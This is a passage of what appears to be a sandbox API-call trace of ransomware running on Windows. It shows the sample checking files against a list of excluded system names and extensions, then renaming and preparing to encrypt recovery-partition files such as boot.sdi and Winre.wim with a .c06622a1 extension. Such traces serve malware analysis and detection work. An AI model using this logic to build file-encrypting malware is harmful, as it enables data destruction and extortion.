-16 [0149.124] wcsstr (_Str="boot.sdi", _SubStr="README") returned 0x0 [0149.124] _wcsicmp (_Str1="autorun.inf", _Str2="boot.sdi") returned -1 [0149.124] wcslen (_String="autorun.inf") returned 0xb [0149.124] _wcsicmp (_Str1="boot.ini", _Str2="boot.sdi") returned -10 [0149.124] wcslen (_String="boot.ini") returned 0x8 [0149.124] _wcsicmp (_Str1="bootfont.bin", _Str2="boot.sdi") returned 56 [0149.124] wcslen (_String="bootfont.bin") returned 0xc [0149.124] _wcsicmp (_Str1="bootsect.bak", _Str2="boot.sdi") returned 69 [0149.124] wcslen (_String="bootsect.bak") returned 0xc [0149.124] _wcsicmp (_Str1="desktop.ini", _Str2="boot.sdi") returned 2 [0149.124] wcslen (_String="desktop.ini") returned 0xb [0149.124] _wcsicmp (_Str1="iconcache.db", _Str2="boot.sdi") returned 7 [0149.124] wcslen (_String="iconcache.db") returned 0xc [0149.124] _wcsicmp (_Str1="ntldr", _Str2="boot.sdi") returned 12 [0149.124] wcslen (_String="ntldr") returned 0x5 [0149.124] _wcsicmp (_Str1="ntuser.dat", _Str2="boot.sdi") returned 12 [0149.124] wcslen (_String="ntuser.dat") returned 0xa [0149.124] _wcsicmp (_Str1="ntuser.dat.log", _Str2="boot.sdi") returned 12 [0149.124] wcslen (_String="ntuser.dat.log") returned 0xe [0149.124] _wcsicmp (_Str1="ntuser.ini", _Str2="boot.sdi") returned 12 [0149.124] wcslen (_String="ntuser.ini") returned 0xa [0149.124] _wcsicmp (_Str1="thumbs.db", _Str2="boot.sdi") returned 18 [0149.124] wcslen (_String="thumbs.db") returned 0x9 [0149.124] _wcsicmp (_Str1="386", _Str2="sdi") returned -64 [0149.124] wcslen (_String="386") returned 0x3 [0149.124] _wcsicmp (_Str1="adv", _Str2="sdi") returned -18 [0149.124] wcslen (_String="adv") returned 0x3 [0149.124] _wcsicmp (_Str1="ani", _Str2="sdi") returned -18 [0149.125] wcslen (_String="ani") returned 0x3 [0149.125] _wcsicmp (_Str1="bat", _Str2="sdi") returned -17 [0149.125] wcslen (_String="bat") returned 0x3 [0149.125] _wcsicmp (_Str1="bin", _Str2="sdi") returned -17 [0149.125] wcslen (_String="bin") returned 0x3 [0149.125] _wcsicmp (_Str1="cab", _Str2="sdi") returned -16 [0149.125] wcslen (_String="cab") returned 0x3 [0149.125] _wcsicmp (_Str1="cmd", _Str2="sdi") returned -16 [0149.125] wcslen (_String="cmd") returned 0x3 [0149.125] _wcsicmp (_Str1="com", _Str2="sdi") returned -16 [0149.125] wcslen (_String="com") returned 0x3 [0149.125] _wcsicmp (_Str1="cpl", _Str2="sdi") returned -16 [0149.125] wcslen (_String="cpl") returned 0x3 [0149.125] _wcsicmp (_Str1="cur", _Str2="sdi") returned -16 [0149.125] wcslen (_String="cur") returned 0x3 [0149.125] _wcsicmp (_Str1="deskthemepack", _Str2="sdi") returned -15 [0149.125] wcslen (_String="deskthemepack") returned 0xd [0149.125] _wcsicmp (_Str1="diagcab", _Str2="sdi") returned -15 [0149.125] wcslen (_String="diagcab") returned 0x7 [0149.125] _wcsicmp (_Str1="diagcfg", _Str2="sdi") returned -15 [0149.125] wcslen (_String="diagcfg") returned 0x7 [0149.125] _wcsicmp (_Str1="diagpkg", _Str2="sdi") returned -15 [0149.125] wcslen (_String="diagpkg") returned 0x7 [0149.125] _wcsicmp (_Str1="dll", _Str2="sdi") returned -15 [0149.125] wcslen (_String="dll") returned 0x3 [0149.125] _wcsicmp (_Str1="drv", _Str2="sdi") returned -15 [0149.125] wcslen (_String="drv") returned 0x3 [0149.125] _wcsicmp (_Str1="exe", _Str2="sdi") returned -14 [0149.125] wcslen (_String="exe") returned 0x3 [0149.125] _wcsicmp (_Str1="hlp", _Str2="sdi") returned -11 [0149.125] wcslen (_String="hlp") returned 0x3 [0149.125] _wcsicmp (_Str1="icl", _Str2="sdi") returned -10 [0149.125] wcslen (_String="icl") returned 0x3 [0149.125] _wcsicmp (_Str1="icns", _Str2="sdi") returned -10 [0149.125] wcslen (_String="icns") returned 0x4 [0149.126] _wcsicmp (_Str1="ico", _Str2="sdi") returned -10 [0149.126] wcslen (_String="ico") returned 0x3 [0149.126] _wcsicmp (_Str1="ics", _Str2="sdi") returned -10 [0149.126] wcslen (_String="ics") returned 0x3 [0149.126] _wcsicmp (_Str1="idx", _Str2="sdi") returned -10 [0149.126] wcslen (_String="idx") returned 0x3 [0149.126] _wcsicmp (_Str1="ldf", _Str2="sdi") returned -7 [0149.126] wcslen (_String="ldf") returned 0x3 [0149.126] _wcsicmp (_Str1="lnk", _Str2="sdi") returned -7 [0149.126] wcslen (_String="lnk") returned 0x3 [0149.126] _wcsicmp (_Str1="mod", _Str2="sdi") returned -6 [0149.126] wcslen (_String="mod") returned 0x3 [0149.126] _wcsicmp (_Str1="mpa", _Str2="sdi") returned -6 [0149.126] wcslen (_String="mpa") returned 0x3 [0149.126] _wcsicmp (_Str1="msc", _Str2="sdi") returned -6 [0149.126] wcslen (_String="msc") returned 0x3 [0149.126] _wcsicmp (_Str1="msp", _Str2="sdi") returned -6 [0149.126] wcslen (_String="msp") returned 0x3 [0149.126] _wcsicmp (_Str1="msstyles", _Str2="sdi") returned -6 [0149.126] wcslen (_String="msstyles") returned 0x8 [0149.126] _wcsicmp (_Str1="msu", _Str2="sdi") returned -6 [0149.126] wcslen (_String="msu") returned 0x3 [0149.126] _wcsicmp (_Str1="nls", _Str2="sdi") returned -5 [0149.126] wcslen (_String="nls") returned 0x3 [0149.126] _wcsicmp (_Str1="nomedia", _Str2="sdi") returned -5 [0149.126] wcslen (_String="nomedia") returned 0x7 [0149.126] _wcsicmp (_Str1="ocx", _Str2="sdi") returned -4 [0149.126] wcslen (_String="ocx") returned 0x3 [0149.126] _wcsicmp (_Str1="prf", _Str2="sdi") returned -3 [0149.126] wcslen (_String="prf") returned 0x3 [0149.126] _wcsicmp (_Str1="ps1", _Str2="sdi") returned -3 [0149.126] wcslen (_String="ps1") returned 0x3 [0149.126] _wcsicmp (_Str1="rom", _Str2="sdi") returned -1 [0149.126] wcslen (_String="rom") returned 0x3 [0149.127] _wcsicmp (_Str1="rtp", _Str2="sdi") returned -1 [0149.127] wcslen (_String="rtp") returned 0x3 [0149.127] _wcsicmp (_Str1="scr", _Str2="sdi") returned -1 [0149.127] wcslen (_String="scr") returned 0x3 [0149.127] _wcsicmp (_Str1="shs", _Str2="sdi") returned 4 [0149.127] wcslen (_String="shs") returned 0x3 [0149.127] _wcsicmp (_Str1="spl", _Str2="sdi") returned 12 [0149.127] wcslen (_String="spl") returned 0x3 [0149.127] _wcsicmp (_Str1="sys", _Str2="sdi") returned 21 [0149.127] wcslen (_String="sys") returned 0x3 [0149.127] _wcsicmp (_Str1="theme", _Str2="sdi") returned 1 [0149.127] wcslen (_String="theme") returned 0x5 [0149.127] _wcsicmp (_Str1="themepack", _Str2="sdi") returned 1 [0149.127] wcslen (_String="themepack") returned 0x9 [0149.127] _wcsicmp (_Str1="wpx", _Str2="sdi") returned 4 [0149.127] wcslen (_String="wpx") returned 0x3 [0149.127] _wcsicmp (_Str1="lock", _Str2="sdi") returned -7 [0149.127] wcslen (_String="lock") returned 0x4 [0149.127] _wcsicmp (_Str1="key", _Str2="sdi") returned -8 [0149.127] wcslen (_String="key") returned 0x3 [0149.127] _wcsicmp (_Str1="hta", _Str2="sdi") returned -11 [0149.127] wcslen (_String="hta") returned 0x3 [0149.127] _wcsicmp (_Str1="msi", _Str2="sdi") returned -6 [0149.127] wcslen (_String="msi") returned 0x3 [0149.127] _wcsicmp (_Str1="pdb", _Str2="sdi") returned -3 [0149.127] wcslen (_String="pdb") returned 0x3 [0149.127] _wcsicmp (_Str1="sqlite", _Str2="sdi") returned 13 [0149.127] wcslen (_String="sqlite") returned 0x6 [0149.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0149.127] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1ef010 [0149.128] wcscpy (in: _Dest=0x1ef010, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0149.128] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 0x34 [0149.128] wcscpy (in: _Dest=0x1ef07a, _Source="boot.sdi" | out: _Dest="boot.sdi") returned="boot.sdi" [0149.128] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x80) returned 1 [0149.128] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.128] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.128] ReadFile (in: hFile=0x198, lpBuffer=0x32eea4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ef34, lpOverlapped=0x0 | out: lpBuffer=0x32eea4*, lpNumberOfBytesRead=0x32ef34*=0x90, lpOverlapped=0x0) returned 1 [0149.130] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32eea4, Length=0x80) returned 0xbcac1050 [0149.130] RtlComputeCrc32 (PartialCrc=0x1050, Buffer=0x32eea4, Length=0x80) returned 0xe62c5159 [0149.130] RtlComputeCrc32 (PartialCrc=0x5159, Buffer=0x32eea4, Length=0x80) returned 0x483eb1c5 [0149.130] RtlComputeCrc32 (PartialCrc=0xb1c5, Buffer=0x32eea4, Length=0x80) returned 0x1ece357 [0149.130] RtlComputeCrc32 (PartialCrc=0xe357, Buffer=0x32eea4, Length=0x80) returned 0x63268cde [0149.130] CloseHandle (hObject=0x198) returned 1 [0149.130] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1ff018 [0149.130] wcscpy (in: _Dest=0x1ff018, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0149.131] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 0x3d [0149.131] wcscpy (in: _Dest=0x1ff092, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.131] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1"), dwFlags=0x8) returned 1 [0149.137] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0149.137] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0149.137] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57bc91d9 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23ca28d [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x687e3ca8 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31a0a310 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48264321 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3163d23 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e07d308 [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x350f382d [0149.142] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3396b4f1 [0149.146] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xbb2e76df [0149.146] RtlComputeCrc32 (PartialCrc=0x76df, Buffer=0x710094, Length=0x80) returned 0x3bc09ba3 [0149.146] RtlComputeCrc32 (PartialCrc=0x9ba3, Buffer=0x710094, Length=0x80) returned 0x5bfe0c65 [0149.146] RtlComputeCrc32 (PartialCrc=0xc65, Buffer=0x710094, Length=0x80) returned 0xef393690 [0149.146] RtlComputeCrc32 (PartialCrc=0x3690, Buffer=0x710094, Length=0x80) returned 0x3019f4d6 [0149.146] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0149.146] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1ef010) returned 1 [0149.147] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1ff018) returned 1 [0149.147] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x869c3ea0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x869c3ea0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x869c3ea0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.147] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.147] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0149.147] _wcsicmp (_Str1="Winre.wim", _Str2="README.c06622a1.TXT") returned 5 [0149.147] wcsstr (_Str="Winre.wim", _SubStr="README") returned 0x0 [0149.147] _wcsicmp (_Str1="autorun.inf", _Str2="Winre.wim") returned -22 [0149.148] wcslen (_String="autorun.inf") returned 0xb [0149.148] _wcsicmp (_Str1="boot.ini", _Str2="Winre.wim") returned -21 [0149.148] wcslen (_String="boot.ini") returned 0x8 [0149.148] _wcsicmp (_Str1="bootfont.bin", _Str2="Winre.wim") returned -21 [0149.148] wcslen (_String="bootfont.bin") returned 0xc [0149.148] _wcsicmp (_Str1="bootsect.bak", _Str2="Winre.wim") returned -21 [0149.148] wcslen (_String="bootsect.bak") returned 0xc [0149.148] _wcsicmp (_Str1="desktop.ini", _Str2="Winre.wim") returned -19 [0149.148] wcslen (_String="desktop.ini") returned 0xb [0149.148] _wcsicmp (_Str1="iconcache.db", _Str2="Winre.wim") returned -14 [0149.148] wcslen (_String="iconcache.db") returned 0xc [0149.148] _wcsicmp (_Str1="ntldr", _Str2="Winre.wim") returned -9 [0149.148] wcslen (_String="ntldr") returned 0x5 [0149.148] _wcsicmp (_Str1="ntuser.dat", _Str2="Winre.wim") returned -9 [0149.148] wcslen (_String="ntuser.dat") returned 0xa [0149.148] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Winre.wim") returned -9 [0149.148] wcslen (_String="ntuser.dat.log") returned 0xe [0149.148] _wcsicmp (_Str1="ntuser.ini", _Str2="Winre.wim") returned -9 [0149.148] wcslen (_String="ntuser.ini") returned 0xa [0149.148] _wcsicmp (_Str1="thumbs.db", _Str2="Winre.wim") returned -3 [0149.148] wcslen (_String="thumbs.db") returned 0x9 [0149.148] _wcsicmp (_Str1="386", _Str2="wim") returned -68 [0149.148] wcslen (_String="386") returned 0x3 [0149.148] _wcsicmp (_Str1="adv", _Str2="wim") returned -22 [0149.148] wcslen (_String="adv") returned 0x3 [0149.148] _wcsicmp (_Str1="ani", _Str2="wim") returned -22 [0149.148] wcslen (_String="ani") returned 0x3 [0149.148] _wcsicmp (_Str1="bat", _Str2="wim") returned -21 [0149.148] wcslen (_String="bat") returned 0x3 [0149.148] _wcsicmp (_Str1="bin", _Str2="wim") returned -21 [0149.149] wcslen (_String="bin") returned 0x3 [0149.149] _wcsicmp (_Str1="cab", _Str2="wim") returned -20 [0149.149] wcslen (_String="cab") returned 0x3 [0149.149] _wcsicmp (_Str1="cmd", _Str2="wim") returned -20 [0149.149] wcslen (_String="cmd") returned 0x3 [0149.149] _wcsicmp (_Str1="com", _Str2="wim") returned -20 [0149.149] wcslen (_String="com") returned 0x3 [0149.149] _wcsicmp (_Str1="cpl", _Str2="wim") returned -20 [0149.149] wcslen (_String="cpl") returned 0x3 [0149.149] _wcsicmp (_Str1="cur", _Str2="wim") returned -20 [0149.149] wcslen (_String="cur") returned 0x3 [0149.149] _wcsicmp (_Str1="deskthemepack", _Str2="wim") returned -19 [0149.149] wcslen (_String="deskthemepack") returned 0xd [0149.149] _wcsicmp (_Str1="diagcab", _Str2="wim") returned -19 [0149.149] wcslen (_String="diagcab") returned 0x7 [0149.149] _wcsicmp (_Str1="diagcfg", _Str2="wim") returned -19 [0149.149] wcslen (_String="diagcfg") returned 0x7 [0149.149] _wcsicmp (_Str1="diagpkg", _Str2="wim") returned -19 [0149.149] wcslen (_String="diagpkg") returned 0x7 [0149.149] _wcsicmp (_Str1="dll", _Str2="wim") returned -19 [0149.149] wcslen (_String="dll") returned 0x3 [0149.149] _wcsicmp (_Str1="drv", _Str2="wim") returned -19 [0149.149] wcslen (_String="drv") returned 0x3 [0149.149] _wcsicmp (_Str1="exe", _Str2="wim") returned -18 [0149.149] wcslen (_String="exe") returned 0x3 [0149.149] _wcsicmp (_Str1="hlp", _Str2="wim") returned -15 [0149.149] wcslen (_String="hlp") returned 0x3 [0149.149] _wcsicmp (_Str1="icl", _Str2="wim") returned -14 [0149.149] wcslen (_String="icl") returned 0x3 [0149.149] _wcsicmp (_Str1="icns", _Str2="wim") returned -14 [0149.149] wcslen (_String="icns") returned 0x4 [0149.149] _wcsicmp (_Str1="ico", _Str2="wim") returned -14 [0149.149] wcslen (_String="ico") returned 0x3 [0149.149] _wcsicmp (_Str1="ics", _Str2="wim") returned -14 [0149.150] wcslen (_String="ics") returned 0x3 [0149.150] _wcsicmp (_Str1="idx", _Str2="wim") returned -14 [0149.150] wcslen (_String="idx") returned 0x3 [0149.150] _wcsicmp (_Str1="ldf", _Str2="wim") returned -11 [0149.150] wcslen (_String="ldf") returned 0x3 [0149.150] _wcsicmp (_Str1="lnk", _Str2="wim") returned -11 [0149.150] wcslen (_String="lnk") returned 0x3 [0149.150] _wcsicmp (_Str1="mod", _Str2="wim") returned -10 [0149.150] wcslen (_String="mod") returned 0x3 [0149.150] _wcsicmp (_Str1="mpa", _Str2="wim") returned -10 [0149.150] wcslen (_String="mpa") returned 0x3 [0149.150] _wcsicmp (_Str1="msc", _Str2="wim") returned -10 [0149.150] wcslen (_String="msc") returned 0x3 [0149.150] _wcsicmp (_Str1="msp", _Str2="wim") returned -10 [0149.150] wcslen (_String="msp") returned 0x3 [0149.150] _wcsicmp (_Str1="msstyles", _Str2="wim") returned -10 [0149.150] wcslen (_String="msstyles") returned 0x8 [0149.150] _wcsicmp (_Str1="msu", _Str2="wim") returned -10 [0149.150] wcslen (_String="msu") returned 0x3 [0149.150] _wcsicmp (_Str1="nls", _Str2="wim") returned -9 [0149.150] wcslen (_String="nls") returned 0x3 [0149.150] _wcsicmp (_Str1="nomedia", _Str2="wim") returned -9 [0149.150] wcslen (_String="nomedia") returned 0x7 [0149.150] _wcsicmp (_Str1="ocx", _Str2="wim") returned -8 [0149.150] wcslen (_String="ocx") returned 0x3 [0149.150] _wcsicmp (_Str1="prf", _Str2="wim") returned -7 [0149.150] wcslen (_String="prf") returned 0x3 [0149.150] _wcsicmp (_Str1="ps1", _Str2="wim") returned -7 [0149.150] wcslen (_String="ps1") returned 0x3 [0149.150] _wcsicmp (_Str1="rom", _Str2="wim") returned -5 [0149.150] wcslen (_String="rom") returned 0x3 [0149.150] _wcsicmp (_Str1="rtp", _Str2="wim") returned -5 [0149.150] wcslen (_String="rtp") returned 0x3 [0149.151] _wcsicmp (_Str1="scr", _Str2="wim") returned -4 [0149.151] wcslen (_String="scr") returned 0x3 [0149.151] _wcsicmp (_Str1="shs", _Str2="wim") returned -4 [0149.151] wcslen (_String="shs") returned 0x3 [0149.151] _wcsicmp (_Str1="spl", _Str2="wim") returned -4 [0149.151] wcslen (_String="spl") returned 0x3 [0149.151] _wcsicmp (_Str1="sys", _Str2="wim") returned -4 [0149.151] wcslen (_String="sys") returned 0x3 [0149.151] _wcsicmp (_Str1="theme", _Str2="wim") returned -3 [0149.151] wcslen (_String="theme") returned 0x5 [0149.151] _wcsicmp (_Str1="themepack", _Str2="wim") returned -3 [0149.151] wcslen (_String="themepack") returned 0x9 [0149.151] _wcsicmp (_Str1="wpx", _Str2="wim") returned 7 [0149.151] wcslen (_String="wpx") returned 0x3 [0149.151] _wcsicmp (_Str1="lock", _Str2="wim") returned -11 [0149.151] wcslen (_String="lock") returned 0x4 [0149.151] _wcsicmp (_Str1="key", _Str2="wim") returned -12 [0149.151] wcslen (_String="key") returned 0x3 [0149.151] _wcsicmp (_Str1="hta", _Str2="wim") returned -15 [0149.151] wcslen (_String="hta") returned 0x3 [0149.151] _wcsicmp (_Str1="msi", _Str2="wim") returned -10 [0149.151] wcslen (_String="msi") returned 0x3 [0149.151] _wcsicmp (_Str1="pdb", _Str2="wim") returned -7 [0149.151] wcslen (_String="pdb") returned 0x3 [0149.151] _wcsicmp (_Str1="sqlite", _Str2="wim") returned -4 [0149.151] wcslen (_String="sqlite") returned 0x6 [0149.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0149.152] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1ef010 [0149.152] wcscpy (in: _Dest=0x1ef010, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0149.152] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 0x34 [0149.152] wcscpy (in: _Dest=0x1ef07a, _Source="Winre.wim" | out: _Dest="Winre.wim") returned="Winre.wim" [0149.152] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x80) returned 1 [0149.152] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.152] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.152] ReadFile (in: hFile=0x194, lpBuffer=0x32eea4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ef34, lpOverlapped=0x0 | out: lpBuffer=0x32eea4*, lpNumberOfBytesRead=0x32ef34*=0x90, lpOverlapped=0x0) returned 1 [0149.157] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32eea4, Length=0x80) returned 0xa8a7d037 [0149.157] RtlComputeCrc32 (PartialCrc=0xd037, Buffer=0x32eea4, Length=0x80) returned 0xb62d594e [0149.157] RtlComputeCrc32 (PartialCrc=0x594e, Buffer=0x32eea4, Length=0x80) returned 0x92fd9fd6 [0149.157] RtlComputeCrc32 (PartialCrc=0x9fd6, Buffer=0x32eea4, Length=0x80) returned 0xba396bc3 [0149.157] RtlComputeCrc32 (PartialCrc=0x6bc3, Buffer=0x32eea4, Length=0x80) returned 0x2f3675c4 [0149.157] CloseHandle (hObject=0x194) returned 1 [0149.157] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1ff018 [0149.157] wcscpy (in: _Dest=0x1ff018, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0149.157] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 0x3e [0149.157] wcscpy (in: _Dest=0x1ff094, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.157] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.c06622a1"), dwFlags=0x8) returned 1 [0149.159] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0149.159] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0149.159] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79d509f8 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fffffc3 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f52f8ff [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d5ef227 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x767f7736 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d4f4767 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42bf13c5 [0149.167] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50ac5680 [0149.170] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xae08cc66 [0149.170] RtlComputeCrc32 (PartialCrc=0xcc66, Buffer=0x2690094, Length=0x80) returned 0xf8e0b3ff [0149.170] RtlComputeCrc32 (PartialCrc=0xb3ff, Buffer=0x2690094, Length=0x80) returned 0x40147cc [0149.170] RtlComputeCrc32 (PartialCrc=0x47cc, Buffer=0x2690094, Length=0x80) returned 